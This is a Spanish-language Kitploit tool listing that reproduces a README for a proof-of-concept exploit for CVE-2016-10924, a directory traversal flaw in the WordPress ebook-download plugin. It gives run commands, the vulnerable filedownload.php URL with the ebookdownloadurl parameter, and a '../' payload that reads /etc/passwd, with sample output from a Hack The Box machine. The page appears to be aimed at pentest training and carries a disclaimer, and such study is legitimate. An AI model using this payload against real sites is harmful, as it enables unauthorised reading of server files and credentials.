Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2016-10924-POC — Script de exploit de Prueba de Concepto (PoC) para la vulnerabilidad de Directory Traversal (CVE-2016-10924) encontrada en el plugin de WordPress ebook-download (versiones < 1.2). Esta vulnerabilidad permite lecturas de archivos no autorizadas mediante una solicitud GET manipulada. | Kitploit
Herramientas/GitHubGitHub/alealeluyah/cve-2016-10924-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAprendizaje y Educación
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Ver Repositorio
1hace 1 añoAún no revisado

Script de exploit de Prueba de Concepto (PoC) para la vulnerabilidad de Directory Traversal (CVE-2016-10924) encontrada en el plugin de WordPress ebook-download (versiones < 1.2). Esta vulnerabilidad permite lecturas de archivos no autorizadas mediante una solicitud GET manipulada.

Compartir

CVE-2016-10924-POC

Este repositorio contiene un script de exploit de prueba de concepto (PoC) para la vulnerabilidad de Directory Traversal (CVE-2016-10924) encontrada en el plugin de WordPress ebook-download (versiones < 1.2).

Esta vulnerabilidad permite la lectura no autorizada de archivos mediante una solicitud GET manipulada. El exploit aprovecha un parámetro llamado ebookdownloadurl para recorrer directorios en el servidor objetivo.

Descripción

  • CVE-ID: CVE-2016-10924
  • Tipo de vulnerabilidad: Directory Traversal
  • Componente afectado: plugin ebook-download < 1.2 para WordPress
  • Impacto: los atacantes remotos pueden leer archivos arbitrarios del sistema operativo subyacente, como /etc/passwd, manipulando la ruta de archivo en el parámetro ebookdownloadurl.

Nota: Este PoC es únicamente para fines educativos y de pruebas autorizadas. El uso indebido de esta información puede acarrear consecuencias legales.

Requisitos

  • Python 3.
  • Biblioteca requests (instálala con pip install requests)

Uso

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. Instala las dependencias:

    root@kitploit:~
    pip install requests
    
  3. Ejecuta el exploit:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. Especifica la ruta del archivo a leer: Después de lanzar el script, se te pedirá una ruta de archivo. Por ejemplo:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    Es posible que debas ajustar el número de ../ según la ubicación de la raíz web en el entorno objetivo.

  5. Salir:

    • Escribe exit, quit o pulsa Enter en un prompt vacío para salir.
    • Pulsa Ctrl + C para detener el script inmediatamente.

Ejemplo

Usé este exploit en "Backdoor", una máquina retirada de Hack The Box:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...

Descargo de responsabilidad

Este proyecto está destinado únicamente a fines educativos y de pruebas de seguridad legítimas.
No utilices la información o los scripts de este repositorio en ningún sistema para el que no tengas permiso explícito de prueba.
Los autores y colaboradores no se hacen responsables del mal uso o de los daños causados por esta herramienta.

Licencia

Este proyecto está licenciado bajo la Licencia GNU 2.0. Siéntete libre de usarlo y modificarlo, pero por favor da crédito.


Referencias

  • NVD - CVE-2016-10924
  • WordPress Plugin ebook-download (referencia para versiones vulnerables)
Descargar herramienta